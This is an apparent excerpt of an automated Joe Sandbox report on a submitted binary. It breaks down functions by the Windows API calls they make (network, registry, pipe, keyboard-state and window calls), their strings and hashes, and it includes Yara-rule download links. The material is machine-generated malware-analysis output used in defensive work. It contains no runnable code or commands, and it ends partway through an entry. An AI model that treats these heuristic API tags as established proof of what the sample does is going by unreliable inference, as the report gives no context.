Opcode Fuzzy Hash: 9fcb496c80e28e90b7140f219e6954c8683e47d99455ebac28ffd4cc43ecd2ce
Instruction Fuzzy Hash: C931A271904219ABDF01EFA4CC519EFB3B5FF05320B108A2AE835AB6D1DB35A905CB84

Function 003E8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003E8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003E8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 003E8F57

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

Strings

ComboBox, xrefs: 003E8E9E
ListBox, xrefs: 003E8ED3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 67c9e17d3dfa4cc80a75f590467e8e7441dd0b5c1173d20d09499103b77ebc80
Instruction ID: c4538429a9f1e83ce662fed04dbc406f9ee8171493d53b4636d81300e409e40e
Opcode Fuzzy Hash: 67c9e17d3dfa4cc80a75f590467e8e7441dd0b5c1173d20d09499103b77ebc80
Instruction Fuzzy Hash: 06210171A04204BEEF16ABB1EC85DFFB769DF05320B148629F4299B2E0DF39480A9610

Function 0040182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0040184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004018A2
InternetCloseHandle.WININET(00000000), ref: 004018E9

Part of subcall function 00402483: GetLastError.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 00402498
Part of subcall function 00402483: SetEvent.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 004024AD

Strings

, xrefs: 00401893

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: da056c70a7e163b51ba99abb0143eb87337cefd5b2b4e6cff7bdf779a594c264
Instruction ID: 9634aa0fad748d0fc237920f426524a102e591f6e17ea564443f005daa6428ad
Opcode Fuzzy Hash: da056c70a7e163b51ba99abb0143eb87337cefd5b2b4e6cff7bdf779a594c264
Instruction Fuzzy Hash: 5521B3B25002087FEB11AF61CC85EBF77EDEB48754F10813BF505A6290DA788E0557A9

Function 004163E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00391D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00391D73
Part of subcall function 00391D35: GetStockObject.GDI32(00000011), ref: 00391D87
Part of subcall function 00391D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00391D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00416461
LoadLibraryW.KERNEL32(?), ref: 00416468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0041647D
DestroyWindow.USER32(?), ref: 00416485

Strings

SysAnimate32, xrefs: 0041643C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: e9b152dca795272c7abfde6399fafaa21866b5de0457c3dfd9263342c469b381
Instruction ID: c287eecbdd0cc1e5594438a3af7fcde1d5c33214972fadfeda737167fd172053
Opcode Fuzzy Hash: e9b152dca795272c7abfde6399fafaa21866b5de0457c3dfd9263342c469b381
Instruction Fuzzy Hash: 19219F71100205BFEF108FA4DC40EFB37ADEB58328F11862AFA5492290D739DC829768

Function 003F6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 003F6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F6DEF
GetStdHandle.KERNEL32(0000000C), ref: 003F6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003F6E3B

Strings

nul, xrefs: 003F6E36

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 2da8a12e4a435a4118659195d8828538507c3319c0ee4e66eec1937704b17759
Instruction ID: ef0fa09ff367811e89379ad901d20031ae460e6f5cb1ee789616261336beab1d
Opcode Fuzzy Hash: 2da8a12e4a435a4118659195d8828538507c3319c0ee4e66eec1937704b17759
Instruction Fuzzy Hash: 9D21D67560030DABDB219F29DC06AAA77F8FF54720F204629FEA1D72D0D7719815CB54

Function 003F6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 003F6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F6EBB
GetStdHandle.KERNEL32(000000F6), ref: 003F6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003F6F06

Strings

nul, xrefs: 003F6F01

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: daeaed5e9d27d0620c2e4748e970a8404fa7ea1ca3e836c945dd846f95799270
Instruction ID: 3c943d62eb771c9d1f521e0dc31e24640d3ffc6db8dc6065ead1f860c39f32b7
Opcode Fuzzy Hash: daeaed5e9d27d0620c2e4748e970a8404fa7ea1ca3e836c945dd846f95799270
Instruction Fuzzy Hash: 1921C47A6003099BDB219F69DD06ABA77A8EF65730F204B29FEE0D72D0D7719841CB10

Function 003FAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003FAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003FACA8
__swprintf.LIBCMT ref: 003FACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0041F910), ref: 003FACFF

Strings

%lu, xrefs: 003FACBB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 75c345c275ad33aa90e7be6831c6e8dd26f7a6a3ec15eba1b346731ebb3ab1d9
Instruction ID: 0963a02d6319e193dc1ba61f776be17b15bbc85f15b5586c9e7656b1025d98d5
Opcode Fuzzy Hash: 75c345c275ad33aa90e7be6831c6e8dd26f7a6a3ec15eba1b346731ebb3ab1d9
Instruction Fuzzy Hash: 24218370A00109AFCB11DF69C945EEE7BB8EF49314B104069F909DB251DB31EE45DB61

Function 003F1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F118E
Sleep.KERNEL32(?,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F11C1

Strings

@?, xrefs: 003F119D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @?
API String ID: 2875609808-2350057378
Opcode ID: 83b9280dd7b981317dcf6c8cdf86f60725ba43898fdc681f2a57f767f5476d8d
Instruction ID: d69d61d63031bf1829c9dd652031ebe57f4bd2423d3f6b110ceb3960558262af
Opcode Fuzzy Hash: 83b9280dd7b981317dcf6c8cdf86f60725ba43898fdc681f2a57f767f5476d8d
Instruction Fuzzy Hash: F1113C31D0091DE7CF019FA5E949AFEBB78FF09711F014165EB41B6240CB709955CB99

Function 003F1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003F1B19

Strings

KEYS, xrefs: 003F1B30
REMOVE, xrefs: 003F1B1F
APPEND, xrefs: 003F1B52
EXISTS, xrefs: 003F1B41

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 677c8bc39d3ca355e8179a1b29c87666138e6943e41dee3a09c5fb5c78a80727
Instruction ID: afab5f48c67be01a2866c03ae1eb1435e6423810a7e440f2596a684436aea883
Opcode Fuzzy Hash: 677c8bc39d3ca355e8179a1b29c87666138e6943e41dee3a09c5fb5c78a80727
Instruction Fuzzy Hash: D011A13091010CDFCF05EF64D8619FEB3B4FF25308B1084A9D914AB692EB325D06CB44

Function 0040EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0040EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0040ED6A
CloseHandle.KERNEL32(?), ref: 0040EDEB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 647e8fe18a424c88b8e69b7d66f0028b758722212f17c0309da55863d32dc4b2
Instruction ID: ac039631f077aa71af19bc7c0de4cf0e3ffd54d327a1dbbcc038146699d329b9
Opcode Fuzzy Hash: 647e8fe18a424c88b8e69b7d66f0028b758722212f17c0309da55863d32dc4b2
Instruction Fuzzy Hash: 788160716043019FDB21EF29C846F2AB7E5AF89710F04882EF999DB3D2D674AC41CB95

Function 003B541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 003B547B
_memcpy_s.LIBCMT ref: 003B54ED
__read_nolock.LIBCMT ref: 003B554B
__filbuf.LIBCMT ref: 003B556E
_memset.LIBCMT ref: 003B55B2

Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: e0356df55083788a712694b407fcc5dc6e5309558bdc3251d3aed7e2244b66af
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: CE51EB30A00B05DBCB369F69D8407EE77A6EF41329F14872AF93696AD0D770DD508B40

Function 00410037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 00410E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004100FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0041013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00410183
RegCloseKey.ADVAPI32(?,?), ref: 004101AF
RegCloseKey.ADVAPI32(00000000), ref: 004101BC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: ba8af5ad4a5d95a628353baf7a1f53751639fe27ee6085d54dd6a15ebd2fa22d
Instruction ID: 609970a2e515f8bd14b3b1b7b1b61e8b6e0c9dce3e23bbdf78022c60fcf4d31b
Opcode Fuzzy Hash: ba8af5ad4a5d95a628353baf7a1f53751639fe27ee6085d54dd6a15ebd2fa22d
Instruction Fuzzy Hash: 8C518F31208204AFDB15EF68C881FABB7E8FF88314F00492EF5558B291DB75E985CB56

Function 0040D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040D927
GetProcAddress.KERNEL32(00000000,?), ref: 0040D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0040DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040DA21

Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003F7896,?,?,00000000), ref: 00395A2C
Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003F7896,?,?,00000000,?,?), ref: 00395A50

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 71bb849a1487cb2f261a8ed2e8c63008d6c7981777b8f02dcbd5614a00ffa4e0
Instruction ID: afef91658e33a11faa725eaa24ff50fd68b562f9d1ae89d8d17e250d128b61fe
Opcode Fuzzy Hash: 71bb849a1487cb2f261a8ed2e8c63008d6c7981777b8f02dcbd5614a00ffa4e0
Instruction Fuzzy Hash: 29512975A00209DFCB01EFA8C4859AEB7F4FF09320B04816AE859AB352D735AD4ACF55

Function 003FE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003FE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003FE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003FE687

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003FE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003FE6B4

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 10147e3077b52acb2d8b0fdc700ca19eea485b1a5980276928c523aec9010d89
Instruction ID: 03139f5d71d5ac44ca9d1cf1afb14c06c791d6d861bb34f0f39141f22d75d66c
Opcode Fuzzy Hash: 10147e3077b52acb2d8b0fdc700ca19eea485b1a5980276928c523aec9010d89
Instruction Fuzzy Hash: 5E510A35A00119DFCF06EF68C981AAEBBF5EF09314B1480A9E909AF361DB31ED11DB50

Function 0041A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c972010ea06f4f43e4c986213250fee2865a9cc950e951f472a10b142b54839e
Instruction ID: de66e4849801c9084e086c4f668c54b1b71113b315099423abca6de9416b1f54
Opcode Fuzzy Hash: c972010ea06f4f43e4c986213250fee2865a9cc950e951f472a10b142b54839e
Instruction Fuzzy Hash: 4241F735906214BFC711DF24CC48FEABBA4EB09320F144166FC15A73E1C734ADA6DA5A

Function 00392344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00392357
ScreenToClient.USER32(004557B0,?), ref: 00392374
GetAsyncKeyState.USER32(00000001), ref: 00392399
GetAsyncKeyState.USER32(00000002), ref: 003923A7

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 7960842d7fa2b47a0fb58e23f6be93e7b54fa4aa688a4520785f53557a3fa13f
Instruction ID: 5c3abe9cdc801669376b6f074426c7effa3951e1f429f5fe799560a90a1b4bf8
Opcode Fuzzy Hash: 7960842d7fa2b47a0fb58e23f6be93e7b54fa4aa688a4520785f53557a3fa13f
Instruction Fuzzy Hash: 50418F39604515FBCF168F69C884FEABB74FB05364F21432AF828962A0C734AD94DB90

Function 003E63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 003E6433
TranslateMessage.USER32(?), ref: 003E645C
DispatchMessageW.USER32(?), ref: 003E6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E6475

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 5acea202da420264d092b26799b5f8bc1daae82a6315c43ed22d7ae95e50a0c2
Instruction ID: dc1bc8c64e0460a973dc247f1824da2360f3165cc654ce93974846d6eb8de3f4
Opcode Fuzzy Hash: 5acea202da420264d092b26799b5f8bc1daae82a6315c43ed22d7ae95e50a0c2
Instruction Fuzzy Hash: D331F4316007A6AFDB22DFB28C46BF67BACAB20381F154275E421C21E2E734D449CF60

Function 003E8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003E8A30
PostMessageW.USER32(?,00000201,00000001), ref: 003E8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003E8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 003E8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003E8AF8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
